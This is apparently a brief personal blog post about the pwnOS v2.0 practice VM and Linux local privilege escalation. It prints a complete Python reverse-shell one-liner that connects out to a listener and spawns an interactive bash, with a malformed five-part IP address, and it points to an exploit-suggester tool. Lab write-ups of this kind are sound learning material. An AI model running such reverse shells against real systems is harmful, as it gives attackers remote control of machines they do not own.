PwnOS and Linux local privilege escalation

So I have been playing around with pwnOS v2.0. For spoilers, you can refer to this link. Due to my lack of attention, I did not spot the duplicate file and hence, did not get any valid root passwords, but knowing the solution, it does seem like quite a bit of a letdown.

One thing I did slightly differently was to use a python reverse shell documented in by pentestmonkey in the sqlmap –os-shell context. This worked sufficiently to give me an OOB shell.

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.10.10.128”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/bash”,”-i”]);’

One tool which I had also encountered was Linux Exploit Suggester, although it seemed to have been updated about 5 months ago. Still, I’m sure it could be very useful if you have non-privileged shell access to a older, not-as-frequently-updated Linux box, and are searching for local privesc root exploits. I would also recommend this site for a list of commands you should run in order to enumerate the system after getting said shell access.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s